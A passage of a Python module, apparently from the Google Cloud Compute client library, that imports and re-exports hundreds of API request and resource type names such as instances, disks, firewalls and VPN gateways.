DeleteRegionNetworkEndpointGroupRequest, DeleteRegionNotificationEndpointRequest, DeleteRegionOperationRequest, DeleteRegionOperationResponse, DeleteRegionSslCertificateRequest, DeleteRegionTargetHttpProxyRequest, DeleteRegionTargetHttpsProxyRequest, DeleteRegionUrlMapRequest, DeleteReservationRequest, DeleteResourcePolicyRequest, DeleteRouteRequest, DeleteRouterRequest, DeleteSecurityPolicyRequest, DeleteServiceAttachmentRequest, DeleteSignedUrlKeyBackendBucketRequest, DeleteSignedUrlKeyBackendServiceRequest, DeleteSnapshotRequest, DeleteSslCertificateRequest, DeleteSslPolicyRequest, DeleteSubnetworkRequest, DeleteTargetGrpcProxyRequest, DeleteTargetHttpProxyRequest, DeleteTargetHttpsProxyRequest, DeleteTargetInstanceRequest, DeleteTargetPoolRequest, DeleteTargetSslProxyRequest, DeleteTargetTcpProxyRequest, DeleteTargetVpnGatewayRequest, DeleteUrlMapRequest, DeleteVpnGatewayRequest, DeleteVpnTunnelRequest, DeleteZoneOperationRequest, DeleteZoneOperationResponse, Denied, DeprecateImageRequest, DeprecationStatus, DetachDiskInstanceRequest, DetachNetworkEndpointsGlobalNetworkEndpointGroupRequest, DetachNetworkEndpointsNetworkEndpointGroupRequest, DisableXpnHostProjectRequest, DisableXpnResourceProjectRequest, Disk, DiskAggregatedList, DiskInstantiationConfig, DiskList, DiskMoveRequest, DisksAddResourcePoliciesRequest, DisksRemoveResourcePoliciesRequest, DisksResizeRequest, DisksScopedList, DiskType, DiskTypeAggregatedList, DiskTypeList, DiskTypesScopedList, DisplayDevice, DistributionPolicy, DistributionPolicyZoneConfiguration, Duration, EnableXpnHostProjectRequest, EnableXpnResourceProjectRequest, Error, Errors, ExchangedPeeringRoute, ExchangedPeeringRoutesList, ExpandIpCidrRangeSubnetworkRequest, Expr, ExternalVpnGateway, ExternalVpnGatewayInterface, ExternalVpnGatewayList, FileContentBuffer, Firewall, FirewallList, FirewallLogConfig, FirewallPoliciesListAssociationsResponse, FirewallPolicy, FirewallPolicyAssociation, FirewallPolicyList, FirewallPolicyRule, FirewallPolicyRuleMatcher, FirewallPolicyRuleMatcherLayer4Config, FixedOrPercent, ForwardingRule, ForwardingRuleAggregatedList, ForwardingRuleList, ForwardingRuleReference, ForwardingRuleServiceDirectoryRegistration, ForwardingRulesScopedList, GetAcceleratorTypeRequest, GetAddressRequest, GetAssociationFirewallPolicyRequest, GetAutoscalerRequest, GetBackendBucketRequest, GetBackendServiceRequest, GetDiagnosticsInterconnectRequest, GetDiskRequest, GetDiskTypeRequest, GetEffectiveFirewallsInstanceRequest, GetEffectiveFirewallsNetworkRequest, GetExternalVpnGatewayRequest, GetFirewallPolicyRequest, GetFirewallRequest, GetForwardingRuleRequest, GetFromFamilyImageRequest, GetGlobalAddressRequest, GetGlobalForwardingRuleRequest, GetGlobalNetworkEndpointGroupRequest, GetGlobalOperationRequest, GetGlobalOrganizationOperationRequest, GetGlobalPublicDelegatedPrefixeRequest, GetGuestAttributesInstanceRequest, GetHealthBackendServiceRequest, GetHealthCheckRequest, GetHealthRegionBackendServiceRequest, GetHealthTargetPoolRequest, GetIamPolicyDiskRequest, GetIamPolicyFirewallPolicyRequest, GetIamPolicyImageRequest, GetIamPolicyInstanceRequest, GetIamPolicyInstanceTemplateRequest, GetIamPolicyLicenseRequest, GetIamPolicyNodeGroupRequest, GetIamPolicyNodeTemplateRequest, GetIamPolicyRegionDiskRequest, GetIamPolicyReservationRequest, GetIamPolicyResourcePolicyRequest, GetIamPolicyServiceAttachmentRequest, GetIamPolicySnapshotRequest, GetIamPolicySubnetworkRequest, GetImageFamilyViewRequest, GetImageRequest, GetInstanceGroupManagerRequest, GetInstanceGroupRequest, GetInstanceRequest, GetInstanceTemplateRequest, GetInterconnectAttachmentRequest, GetInterconnectLocationRequest, GetInterconnectRequest, GetLicenseCodeRequest, GetLicenseRequest, GetMachineTypeRequest, GetNatMappingInfoRoutersRequest, GetNetworkEndpointGroupRequest, GetNetworkRequest, GetNodeGroupRequest, GetNodeTemplateRequest, GetNodeTypeRequest, GetPacketMirroringRequest, GetProjectRequest, GetPublicAdvertisedPrefixeRequest, GetPublicDelegatedPrefixeRequest, GetRegionAutoscalerRequest, GetRegionBackendServiceRequest, GetRegionCommitmentRequest, GetRegionDiskRequest, GetRegionDiskTypeRequest, GetRegionHealthCheckRequest, GetRegionHealthCheckServiceRequest, GetRegionInstanceGroupManagerRequest, GetRegionInstanceGroupRequest, GetRegionNetworkEndpointGroupRequest, GetRegionNotificationEndpointRequest, GetRegionOperationRequest, GetRegionRequest, GetRegionSslCertificateRequest, GetRegionTargetHttpProxyRequest, GetRegionTargetHttpsProxyRequest, GetRegionUrlMapRequest, GetReservationRequest, GetResourcePolicyRequest, GetRouteRequest, GetRouterRequest, GetRouterStatusRouterRequest, GetRuleFirewallPolicyRequest, GetRuleSecurityPolicyRequest, GetScreenshotInstanceRequest, GetSecurityPolicyRequest, GetSerialPortOutputInstanceRequest, GetServiceAttachmentRequest, GetShieldedInstanceIdentityInstanceRequest, GetSnapshotRequest, GetSslCertificateRequest, GetSslPolicyRequest, GetStatusVpnGatewayRequest, GetSubnetworkRequest, GetTargetGrpcProxyRequest, GetTargetHttpProxyRequest, GetTargetHttpsProxyRequest, GetTargetInstanceRequest, GetTargetPoolRequest, GetTargetSslProxyRequest, GetTargetTcpProxyRequest, GetTargetVpnGatewayRequest, GetUrlMapRequest, GetVpnGatewayRequest, GetVpnTunnelRequest, GetXpnHostProjectRequest, GetXpnResourcesProjectsRequest, GetZoneOperationRequest, GetZoneRequest, GlobalNetworkEndpointGroupsAttachEndpointsRequest, GlobalNetworkEndpointGroupsDetachEndpointsRequest, GlobalOrganizationSetPolicyRequest, GlobalSetLabelsRequest, GlobalSetPolicyRequest, GRPCHealthCheck, GuestAttributes, GuestAttributesEntry, GuestAttributesValue, GuestOsFeature, HealthCheck, HealthCheckList, HealthCheckLogConfig, HealthCheckReference, HealthChecksAggregatedList, HealthCheckService, HealthCheckServiceReference, HealthCheckServicesList, HealthChecksScopedList, HealthStatus, HealthStatusForNetworkEndpoint, HostRule, HTTP2HealthCheck, HttpFaultAbort, HttpFaultDelay, HttpFaultInjection, HttpHeaderAction, HttpHeaderMatch, HttpHeaderOption, HTTPHealthCheck, HttpQueryParameterMatch, HttpRedirectAction, HttpRetryPolicy, HttpRouteAction, HttpRouteRule, HttpRouteRuleMatch, HTTPSHealthCheck, Image, ImageFamilyView, ImageList, InitialStateConfig, InsertAddressRequest, InsertAutoscalerRequest, InsertBackendBucketRequest, InsertBackendServiceRequest, InsertDiskRequest, InsertExternalVpnGatewayRequest, InsertFirewallPolicyRequest, InsertFirewallRequest, InsertForwardingRuleRequest, InsertGlobalAddressRequest, InsertGlobalForwardingRuleRequest, InsertGlobalNetworkEndpointGroupRequest, InsertGlobalPublicDelegatedPrefixeRequest, InsertHealthCheckRequest, InsertImageRequest, InsertInstanceGroupManagerRequest, InsertInstanceGroupRequest, InsertInstanceRequest, InsertInstanceTemplateRequest, InsertInterconnectAttachmentRequest, InsertInterconnectRequest, InsertLicenseRequest, InsertNetworkEndpointGroupRequest, InsertNetworkRequest, InsertNodeGroupRequest, InsertNodeTemplateRequest, InsertPacketMirroringRequest, InsertPublicAdvertisedPrefixeRequest, InsertPublicDelegatedPrefixeRequest, InsertRegionAutoscalerRequest, InsertRegionBackendServiceRequest, InsertRegionCommitmentRequest, InsertRegionDiskRequest, InsertRegionHealthCheckRequest, InsertRegionHealthCheckServiceRequest, InsertRegionInstanceGroupManagerRequest, InsertRegionNetworkEndpointGroupRequest, InsertRegionNotificationEndpointRequest, InsertRegionSslCertificateRequest, InsertRegionTargetHttpProxyRequest, InsertRegionTargetHttpsProxyRequest, InsertRegionUrlMapRequest, InsertReservationRequest, InsertResourcePolicyRequest, InsertRouteRequest, InsertRouterRequest, InsertSecurityPolicyRequest, InsertServiceAttachmentRequest, InsertSslCertificateRequest, InsertSslPolicyRequest, InsertSubnetworkRequest, InsertTargetGrpcProxyRequest, InsertTargetHttpProxyRequest, InsertTargetHttpsProxyRequest, InsertTargetInstanceRequest, InsertTargetPoolRequest, InsertTargetSslProxyRequest, InsertTargetTcpProxyRequest, InsertTargetVpnGatewayRequest, InsertUrlMapRequest, InsertVpnGatewayRequest, InsertVpnTunnelRequest, Instance, InstanceAggregatedList, InstanceGroup, InstanceGroupAggregatedList, InstanceGroupList, InstanceGroupManager, InstanceGroupManagerActionsSummary, InstanceGroupManagerAggregatedList, InstanceGroupManagerAutoHealingPolicy, InstanceGroupManagerList, InstanceGroupManagersAbandonInstancesRequest, InstanceGroupManagersApplyUpdatesRequest, InstanceGroupManagersCreateInstancesRequest, InstanceGroupManagersDeleteInstancesRequest, InstanceGroupManagersDeletePerInstanceConfigsReq, InstanceGroupManagersListErrorsResponse, InstanceGroupManagersListManagedInstancesResponse, InstanceGroupManagersListPerInstanceConfigsResp, InstanceGroupManagersPatchPerInstanceConfigsReq, InstanceGroupManagersRecreateInstancesRequest, InstanceGroupManagersScopedList, InstanceGroupManagersSetInstanceTemplateRequest, InstanceGroupManagersSetTargetPoolsRequest, InstanceGroupManagerStatus, InstanceGroupManagerStatusStateful, InstanceGroupManagerStatusStatefulPerInstanceConfigs, InstanceGroupManagerStatusVersionTarget, InstanceGroupManagersUpdatePerInstanceConfigsReq, InstanceGroupManagerUpdatePolicy, InstanceGroupManagerVersion, InstanceGroupsAddInstancesRequest, InstanceGroupsListInstances, InstanceGroupsListInstancesRequest, InstanceGroupsRemoveInstancesRequest, InstanceGroupsScopedList, InstanceGroupsSetNamedPortsRequest, InstanceList, InstanceListReferrers, InstanceManagedByIgmError, InstanceManagedByIgmErrorInstanceActionDetails, InstanceManagedByIgmErrorManagedInstanceError, InstanceMoveRequest, InstanceProperties, InstanceReference, InstancesAddResourcePoliciesRequest, InstancesGetEffectiveFirewallsResponse, InstancesGetEffectiveFirewallsResponseEffectiveFirewallPolicy, InstancesRemoveResourcePoliciesRequest, InstancesScopedList, InstancesSetLabelsRequest, InstancesSetMachineResourcesRequest, InstancesSetMachineTypeRequest, InstancesSetMinCpuPlatformRequest, InstancesSetServiceAccountRequest, InstancesStartWithEncryptionKeyRequest, InstanceTemplate, InstanceTemplateList, InstanceWithNamedPorts, Int64RangeMatch, Interconnect, InterconnectAttachment, InterconnectAttachmentAggregatedList, InterconnectAttachmentList, InterconnectAttachmentPartnerMetadata, InterconnectAttachmentPrivateInfo, InterconnectAttachmentsScopedList, InterconnectCircuitInfo, InterconnectDiagnostics, InterconnectDiagnosticsARPEntry, InterconnectDiagnosticsLinkLACPStatus, InterconnectDiagnosticsLinkOpticalPower, InterconnectDiagnosticsLinkStatus, InterconnectList, InterconnectLocation, InterconnectLocationList, InterconnectLocationRegionInfo, InterconnectOutageNotification, InterconnectsGetDiagnosticsResponse, InvalidateCacheUrlMapRequest, Items, License, LicenseCode, LicenseCodeLicenseAlias, LicenseResourceCommitment, LicenseResourceRequirements, LicensesListResponse, ListAcceleratorTypesRequest, ListAddressesRequest, ListAssociationsFirewallPolicyRequest, ListAutoscalersRequest, ListAvailableFeaturesSslPoliciesRequest, ListBackendBucketsRequest, ListBackendServicesRequest, ListDisksRequest, ListDiskTypesRequest, ListErrorsInstanceGroupManagersRequest, ListErrorsRegionInstanceGroupManagersRequest, ListExternalVpnGatewaysRequest, ListFirewallPoliciesRequest, ListFirewallsRequest, ListForwardingRulesRequest, ListGlobalAddressesRequest, ListGlobalForwardingRulesRequest, ListGlobalNetworkEndpointGroupsRequest, ListGlobalOperationsRequest, ListGlobalOrganizationOperationsRequest, ListGlobalPublicDelegatedPrefixesRequest, ListHealthChecksRequest, ListImagesRequest, ListInstanceGroupManagersRequest, ListInstanceGroupsRequest, ListInstancesInstanceGroupsRequest, ListInstancesRegionInstanceGroupsRequest, ListInstancesRequest, ListInstanceTemplatesRequest, ListInterconnectAttachmentsRequest, ListInterconnectLocationsRequest, ListInterconnectsRequest, ListLicensesRequest, ListMachineTypesRequest, ListManagedInstancesInstanceGroupManagersRequest, ListManagedInstancesRegionInstanceGroupManagersRequest, ListNetworkEndpointGroupsRequest, ListNetworkEndpointsGlobalNetworkEndpointGroupsRequest, ListNetworkEndpointsNetworkEndpointGroupsRequest, ListNetworksRequest, ListNodeGroupsRequest, ListNodesNodeGroupsRequest, ListNodeTemplatesRequest, ListNodeTypesRequest, ListPacketMirroringsRequest, ListPeeringRoutesNetworksRequest, ListPerInstanceConfigsInstanceGroupManagersRequest, ListPerInstanceConfigsRegionInstanceGroupManagersRequest, ListPreconfiguredExpressionSetsSecurityPoliciesRequest, ListPublicAdvertisedPrefixesRequest, ListPublicDelegatedPrefixesRequest, ListReferrersInstancesRequest, ListRegionAutoscalersRequest, ListRegionBackendServicesRequest, ListRegionCommitmentsRequest, ListRegionDisksRequest, ListRegionDiskTypesRequest, ListRegionHealthCheckServicesRequest, ListRegionHealthChecksRequest, ListRegionInstanceGroupManagersRequest, ListRegionInstanceGroupsRequest, ListRegionNetworkEndpointGroupsRequest, ListRegionNotificationEndpointsRequest, ListRegionOperationsRequest, ListRegionsRequest, ListRegionSslCertificatesRequest, ListRegionTargetHttpProxiesRequest, ListRegionTargetHttpsProxiesRequest, ListRegionUrlMapsRequest, ListReservationsRequest, ListResourcePoliciesRequest, ListRoutersRequest, ListRoutesRequest, ListSecurityPoliciesRequest, ListServiceAttachmentsRequest, ListSnapshotsRequest, ListSslCertificatesRequest, ListSslPoliciesRequest, ListSubnetworksRequest, ListTargetGrpcProxiesRequest, ListTargetHttpProxiesRequest, ListTargetHttpsProxiesRequest, ListTargetInstancesRequest, ListTargetPoolsRequest, ListTargetSslProxiesRequest, ListTargetTcpProxiesRequest, ListTargetVpnGatewaysRequest, ListUrlMapsRequest, ListUsableSubnetworksRequest, ListVpnGatewaysRequest, ListVpnTunnelsRequest, ListXpnHostsProjectsRequest, ListZoneOperationsRequest, ListZonesRequest, LocalDisk, LocationPolicy, LocationPolicyLocation, LogConfig, LogConfigCloudAuditOptions, LogConfigCounterOptions, LogConfigCounterOptionsCustomField, LogConfigDataAccessOptions, MachineType, MachineTypeAggregatedList, MachineTypeList, MachineTypesScopedList, ManagedInstance, ManagedInstanceInstanceHealth, ManagedInstanceLastAttempt, ManagedInstanceVersion, Metadata, MetadataFilter, MetadataFilterLabelMatch, MoveDiskProjectRequest, MoveFirewallPolicyRequest, MoveInstanceProjectRequest, NamedPort, Network, NetworkEndpoint, NetworkEndpointGroup, NetworkEndpointGroupAggregatedList, NetworkEndpointGroupAppEngine, NetworkEndpointGroupCloudFunction, NetworkEndpointGroupCloudRun, NetworkEndpointGroupList, NetworkEndpointGroupsAttachEndpointsRequest, NetworkEndpointGroupsDetachEndpointsRequest, NetworkEndpointGroupsListEndpointsRequest, NetworkEndpointGroupsListNetworkEndpoints, NetworkEndpointGroupsScopedList, NetworkEndpointWithHealthStatus, NetworkInterface, NetworkList, NetworkPeering, NetworkRoutingConfig, NetworksAddPeeringRequest, NetworksGetEffectiveFirewallsResponse, NetworksGetEffectiveFirewallsResponseEffectiveFirewallPolicy, NetworksRemovePeeringRequest, NetworksUpdatePeeringRequest, NodeGroup, NodeGroupAggregatedList, NodeGroupAutoscalingPolicy, NodeGroupList, NodeGroupMaintenanceWindow, NodeGroupNode, NodeGroupsAddNodesRequest, NodeGroupsDeleteNodesRequest, NodeGroupsListNodes, NodeGroupsScopedList, NodeGroupsSetNodeTemplateRequest, NodeTemplate, NodeTemplateAggregatedList, NodeTemplateList, NodeTemplateNodeTypeFlexibility, NodeTemplatesScopedList, NodeType, NodeTypeAggregatedList, NodeTypeList, NodeTypesScopedList, NotificationEndpoint, NotificationEndpointGrpcSettings, NotificationEndpointList, Operation, OperationAggregatedList, OperationList, OperationsScopedList, OutlierDetection, PacketMirroring, PacketMirroringAggregatedList, PacketMirroringFilter, PacketMirroringForwardingRuleInfo, PacketMirroringList, PacketMirroringMirroredResourceInfo, PacketMirroringMirroredResourceInfoInstanceInfo, PacketMirroringMirroredResourceInfoSubnetInfo, PacketMirroringNetworkInfo, PacketMirroringsScopedList, PatchAutoscalerRequest, PatchBackendBucketRequest, PatchBackendServiceRequest, PatchFirewallPolicyRequest, PatchFirewallRequest, PatchForwardingRuleRequest, PatchGlobalForwardingRuleRequest, PatchGlobalPublicDelegatedPrefixeRequest, PatchHealthCheckRequest, PatchImageRequest, PatchInstanceGroupManagerRequest, PatchInterconnectAttachmentRequest, PatchInterconnectRequest, PatchNetworkRequest, PatchNodeGroupRequest, PatchPacketMirroringRequest, PatchPerInstanceConfigsInstanceGroupManagerRequest, PatchPerInstanceConfigsRegionInstanceGroupManagerRequest, PatchPublicAdvertisedPrefixeRequest, PatchPublicDelegatedPrefixeRequest, PatchRegionAutoscalerRequest, PatchRegionBackendServiceRequest, PatchRegionHealthCheckRequest, PatchRegionHealthCheckServiceRequest, PatchRegionInstanceGroupManagerRequest, PatchRegionUrlMapRequest, PatchRouterRequest, PatchRuleFirewallPolicyRequest, PatchRuleSecurityPolicyRequest, PatchSecurityPolicyRequest, PatchServiceAttachmentRequest, PatchSslPolicyRequest, PatchSubnetworkRequest, PatchTargetGrpcProxyRequest, PatchTargetHttpProxyRequest, PatchTargetHttpsProxyRequest, PatchUrlMapRequest, PathMatcher, PathRule, PerInstanceConfig, Policy, PreconfiguredWafSet, PreservedState, PreservedStatePreservedDisk, PreviewRouterRequest, Project, ProjectsDisableXpnResourceRequest, ProjectsEnableXpnResourceRequest, ProjectsGetXpnResources, ProjectsListXpnHostsRequest, ProjectsSetDefaultNetworkTierRequest, PublicAdvertisedPrefix, PublicAdvertisedPrefixList, PublicAdvertisedPrefixPublicDelegatedPrefix, PublicDelegatedPrefix, PublicDelegatedPrefixAggregatedList, PublicDelegatedPrefixesScopedList, PublicDelegatedPrefixList, PublicDelegatedPrefixPublicDelegatedSubPrefix, Quota, RawDisk, RecreateInstancesInstanceGroupManagerRequest, RecreateInstancesRegionInstanceGroupManagerRequest, Reference, Region, RegionAutoscalerList, RegionDisksAddResourcePoliciesRequest, RegionDisksRemoveResourcePoliciesRequest, RegionDisksResizeRequest, RegionDiskTypeList, RegionInstanceGroupList, RegionInstanceGroupManagerDeleteInstanceConfigReq, RegionInstanceGroupManagerList, RegionInstanceGroupManagerPatchInstanceConfigReq, RegionInstanceGroupManagersAbandonInstancesRequest, RegionInstanceGroupManagersApplyUpdatesRequest, RegionInstanceGroupManagersCreateInstancesRequest, RegionInstanceGroupManagersDeleteInstancesRequest, RegionInstanceGroupManagersListErrorsResponse, RegionInstanceGroupManagersListInstanceConfigsResp, RegionInstanceGroupManagersListInstancesResponse, RegionInstanceGroupManagersRecreateRequest, RegionInstanceGroupManagersSetTargetPoolsRequest, RegionInstanceGroupManagersSetTemplateRequest, RegionInstanceGroupManagerUpdateInstanceConfigReq, RegionInstanceGroupsListInstances, RegionInstanceGroupsListInstancesRequest, RegionInstanceGroupsSetNamedPortsRequest, RegionList, RegionSetLabelsRequest, RegionSetPolicyRequest, RegionTargetHttpsProxiesSetSslCertificatesRequest, RegionUrlMapsValidateRequest, RemoveAssociationFirewallPolicyRequest, RemoveHealthCheckTargetPoolRequest, RemoveInstancesInstanceGroupRequest, RemoveInstanceTargetPoolRequest, RemovePeeringNetworkRequest, RemoveResourcePoliciesDiskRequest, RemoveResourcePoliciesInstanceRequest, RemoveResourcePoliciesRegionDiskRequest, RemoveRuleFirewallPolicyRequest, RemoveRuleSecurityPolicyRequest, RequestMirrorPolicy, Reservation, ReservationAffinity, ReservationAggregatedList, ReservationList, ReservationsResizeRequest, ReservationsScopedList, ResetInstanceRequest, ResizeDiskRequest, ResizeInstanceGroupManagerRequest, ResizeRegionDiskRequest, ResizeRegionInstanceGroupManagerRequest, ResizeReservationRequest, ResourceCommitment, ResourceGroupReference, ResourcePoliciesScopedList, ResourcePolicy, ResourcePolicyAggregatedList, ResourcePolicyDailyCycle, ResourcePolicyGroupPlacementPolicy, ResourcePolicyHourlyCycle, ResourcePolicyInstanceSchedulePolicy, ResourcePolicyInstanceSchedulePolicySchedule, ResourcePolicyList, ResourcePolicyResourceStatus, ResourcePolicyResourceStatusInstanceSchedulePolicyStatus, ResourcePolicySnapshotSchedulePolicy, ResourcePolicySnapshotSchedulePolicyRetentionPolicy, ResourcePolicySnapshotSchedulePolicySchedule, ResourcePolicySnapshotSchedulePolicySnapshotProperties, ResourcePolicyWeeklyCycle, ResourcePolicyWeeklyCycleDayOfWeek, Route, RouteAsPath, RouteList, Router, RouterAdvertisedIpRange, RouterAggregatedList, RouterBgp, RouterBgpPeer, RouterBgpPeerBfd, RouterInterface, RouterList, RouterNat, RouterNatLogConfig, RouterNatRule, RouterNatRuleAction, RouterNatSubnetworkToNat, RoutersPreviewResponse, RoutersScopedList, RouterStatus, RouterStatusBgpPeerStatus, RouterStatusNatStatus, RouterStatusNatStatusNatRuleStatus, RouterStatusResponse, Rule, ScalingScheduleStatus, Scheduling, SchedulingNodeAffinity, ScratchDisks, Screenshot, SecurityPoliciesListPreconfiguredExpressionSetsResponse, SecurityPoliciesWafConfig, SecurityPolicy, SecurityPolicyAdaptiveProtectionConfig, SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfig, SecurityPolicyAdvancedOptionsConfig, SecurityPolicyList, SecurityPolicyReference, SecurityPolicyRule, SecurityPolicyRuleMatcher, SecurityPolicyRuleMatcherConfig, SecuritySettings, SendDiagnosticInterruptInstanceRequest, SendDiagnosticInterruptInstanceResponse, SerialPortOutput, ServerBinding, ServiceAccount, ServiceAttachment, ServiceAttachmentAggregatedList, ServiceAttachmentConnectedEndpoint, ServiceAttachmentConsumerProjectLimit, ServiceAttachmentList, ServiceAttachmentsScopedList, SetBackendServiceTargetSslProxyRequest, SetBackendServiceTargetTcpProxyRequest, SetBackupTargetPoolRequest, SetCommonInstanceMetadataProjectRequest, SetDefaultNetworkTierProjectRequest, SetDeletionProtectionInstanceRequest, SetDiskAutoDeleteInstanceRequest, SetIamPolicyDiskRequest, SetIamPolicyFirewallPolicyRequest, SetIamPolicyImageRequest, SetIamPolicyInstanceRequest, SetIamPolicyInstanceTemplateRequest, SetIamPolicyLicenseRequest, SetIamPolicyNodeGroupRequest, SetIamPolicyNodeTemplateRequest, SetIamPolicyRegionDiskRequest, SetIamPolicyReservationRequest, SetIamPolicyResourcePolicyRequest, SetIamPolicyServiceAttachmentRequest, SetIamPolicySnapshotRequest, SetIamPolicySubnetworkRequest, SetInstanceTemplateInstanceGroupManagerRequest, SetInstanceTemplateRegionInstanceGroupManagerRequest, SetLabelsDiskRequest, SetLabelsExternalVpnGatewayRequest, SetLabelsForwardingRuleRequest, SetLabelsGlobalForwardingRuleRequest, SetLabelsImageRequest, SetLabelsInstanceRequest, SetLabelsRegionDiskRequest, SetLabelsSnapshotRequest, SetLabelsVpnGatewayRequest, SetMachineResourcesInstanceRequest, SetMachineTypeInstanceRequest, SetMetadataInstanceRequest, SetMinCpuPlatformInstanceRequest, SetNamedPortsInstanceGroupRequest, SetNamedPortsRegionInstanceGroupRequest, SetNodeTemplateNodeGroupRequest, SetPrivateIpGoogleAccessSubnetworkRequest, SetProxyHeaderTargetSslProxyRequest, SetProxyHeaderTargetTcpProxyRequest, SetQuicOverrideTargetHttpsProxyRequest, SetSchedulingInstanceRequest, SetSecurityPolicyBackendServiceRequest, SetServiceAccountInstanceRequest, SetShieldedInstanceIntegrityPolicyInstanceRequest, SetSslCertificatesRegionTargetHttpsProxyRequest, SetSslCertificatesTargetHttpsProxyRequest, SetSslCertificatesTargetSslProxyRequest, SetSslPolicyTargetHttpsProxyRequest, SetSslPolicyTargetSslProxyRequest, SetTagsInstanceRequest, SetTargetForwardingRuleRequest, SetTargetGlobalForwardingRuleRequest, SetTargetPoolsInstanceGroupManagerRequest, SetTargetPoolsRegionInstanceGroupManagerRequest, SetUrlMapRegionTargetHttpProxyRequest, SetUrlMapRegionTargetHttpsProxyRequest, SetUrlMapTargetHttpProxyRequest, SetUrlMapTargetHttpsProxyRequest, SetUsageExportBucketProjectRequest, ShieldedInstanceConfig, ShieldedInstanceIdentity, ShieldedInstanceIdentityEntry, ShieldedInstanceIntegrityPolicy, SignedUrlKey, SimulateMaintenanceEventInstanceRequest, Snapshot, SnapshotList, SourceInstanceParams, SslCertificate, SslCertificateAggregatedList, SslCertificateList, SslCertificateManagedSslCertificate, SslCertificateSelfManagedSslCertificate, SslCertificatesScopedList, SSLHealthCheck, SslPoliciesList, SslPoliciesListAvailableFeaturesResponse, SslPolicy, SslPolicyReference, StartInstanceRequest, StartWithEncryptionKeyInstanceRequest, StatefulPolicy, StatefulPolicyPreservedState, StatefulPolicyPreservedStateDiskDevice, StopInstanceRequest, Subnetwork, SubnetworkAggregatedList, SubnetworkList, SubnetworkLogConfig, SubnetworkSecondaryRange, SubnetworksExpandIpCidrRangeRequest, SubnetworksScopedList, SubnetworksSetPrivateIpGoogleAccessRequest, Subsetting, SwitchToCustomModeNetworkRequest, Tags, TargetGrpcProxy, TargetGrpcProxyList, TargetHttpProxiesScopedList, TargetHttpProxy, TargetHttpProxyAggregatedList, TargetHttpProxyList, TargetHttpsProxiesScopedList, TargetHttpsProxiesSetQuicOverrideRequest, TargetHttpsProxiesSetSslCertificatesRequest, TargetHttpsProxy, TargetHttpsProxyAggregatedList, TargetHttpsProxyList, TargetInstance, TargetInstanceAggregatedList, TargetInstanceList, TargetInstancesScopedList, TargetPool, TargetPoolAggregatedList, TargetPoolInstanceHealth, TargetPoolList, TargetPoolsAddHealthCheckRequest, TargetPoolsAddInstanceRequest, TargetPoolsRemoveHealthCheckRequest, TargetPoolsRemoveInstanceRequest, TargetPoolsScopedList, TargetReference, TargetSslProxiesSetBackendServiceRequest, TargetSslProxiesSetProxyHeaderRequest, TargetSslProxiesSetSslCertificatesRequest, TargetSslProxy, TargetSslProxyList, TargetTcpProxiesSetBackendServiceRequest, TargetTcpProxiesSetProxyHeaderRequest, TargetTcpProxy, TargetTcpProxyList, TargetVpnGateway, TargetVpnGatewayAggregatedList, TargetVpnGatewayList, TargetVpnGatewaysScopedList, TCPHealthCheck, TestFailure, TestIamPermissionsDiskRequest, TestIamPermissionsExternalVpnGatewayRequest, TestIamPermissionsFirewallPolicyRequest, TestIamPermissionsImageRequest, TestIamPermissionsInstanceRequest, TestIamPermissionsInstanceTemplateRequest, TestIamPermissionsLicenseCodeRequest, TestIamPermissionsLicenseRequest, TestIamPermissionsNetworkEndpointGroupRequest, TestIamPermissionsNodeGroupRequest, TestIamPermissionsNodeTemplateRequest, TestIamPermissionsPacketMirroringRequest, TestIamPermissionsRegionDiskRequest, TestIamPermissionsReservationRequest, TestIamPermissionsResourcePolicyRequest, TestIamPermissionsServiceAttachmentRequest, TestIamPermissionsSnapshotRequest, TestIamPermissionsSubnetworkRequest, TestIamPermissionsVpnGatewayRequest, TestPermissionsRequest, TestPermissionsResponse, Uint128, UpdateAccessConfigInstanceRequest, UpdateAutoscalerRequest, UpdateBackendBucketRequest, UpdateBackendServiceRequest, UpdateDisplayDeviceInstanceRequest, UpdateFirewallRequest, UpdateHealthCheckRequest, UpdateInstanceRequest, UpdateNetworkInterfaceInstanceRequest, UpdatePeeringNetworkRequest, UpdatePerInstanceConfigsInstanceGroupManagerRequest, UpdatePerInstanceConfigsRegionInstanceGroupManagerRequest, UpdateRegionAutoscalerRequest, UpdateRegionBackendServiceRequest, UpdateRegionHealthCheckRequest, UpdateRegionUrlMapRequest, UpdateRouterRequest, UpdateShieldedInstanceConfigInstanceRequest, UpdateUrlMapRequest, UrlMap, UrlMapList, UrlMapReference, UrlMapsAggregatedList, UrlMapsScopedList, UrlMapsValidateRequest, UrlMapsValidateResponse, UrlMapTest, UrlMapTestHeader, UrlMapValidationResult, UrlRewrite, UsableSubnetwork, UsableSubnetworksAggregatedList, UsableSubnetworkSecondaryRange, UsageExportLocation, ValidateRegionUrlMapRequest, ValidateUrlMapRequest, VmEndpointNatMappings, VmEndpointNatMappingsInterfaceNatMappings, VmEndpointNatMappingsList, VpnGateway, VpnGatewayAggregatedList, VpnGatewayList, VpnGatewaysGetStatusResponse, VpnGatewaysScopedList, VpnGatewayStatus, VpnGatewayStatusHighAvailabilityRequirementState, VpnGatewayStatusTunnel, VpnGatewayStatusVpnConnection, VpnGatewayVpnGatewayInterface, VpnTunnel, VpnTunnelAggregatedList, VpnTunnelList, VpnTunnelsScopedList, WafExpressionSet, WafExpressionSetExpression, WaitGlobalOperationRequest, WaitRegionOperationRequest, WaitZoneOperationRequest, Warning, Warnings, WeightedBackendService, XpnHostList, XpnResourceId, Zone, ZoneList, ZoneSetLabelsRequest, ZoneSetPolicyRequest, ) __all__ = ( "AbandonInstancesInstanceGroupManagerRequest", "AbandonInstancesRegionInstanceGroupManagerRequest", "AcceleratorConfig", "Accelerators", "AcceleratorType", "AcceleratorTypeAggregatedList", "AcceleratorTypeList", "AcceleratorTypesScopedList", "AccessConfig", "AddAccessConfigInstanceRequest", "AddAssociationFirewallPolicyRequest", "AddHealthCheckTargetPoolRequest", "AddInstancesInstanceGroupRequest", "AddInstanceTargetPoolRequest", "AddNodesNodeGroupRequest", "AddPeeringNetworkRequest", "AddResourcePoliciesDiskRequest", "AddResourcePoliciesInstanceRequest", "AddResourcePoliciesRegionDiskRequest", "Address", "AddressAggregatedList", "AddressesScopedList", "AddressList", "AddRuleFirewallPolicyRequest", "AddRuleSecurityPolicyRequest", "AddSignedUrlKeyBackendBucketRequest", "AddSignedUrlKeyBackendServiceRequest", "AdvancedMachineFeatures", "AggregatedListAcceleratorTypesRequest", "AggregatedListAddressesRequest", "AggregatedListAutoscalersRequest", "AggregatedListBackendServicesRequest", 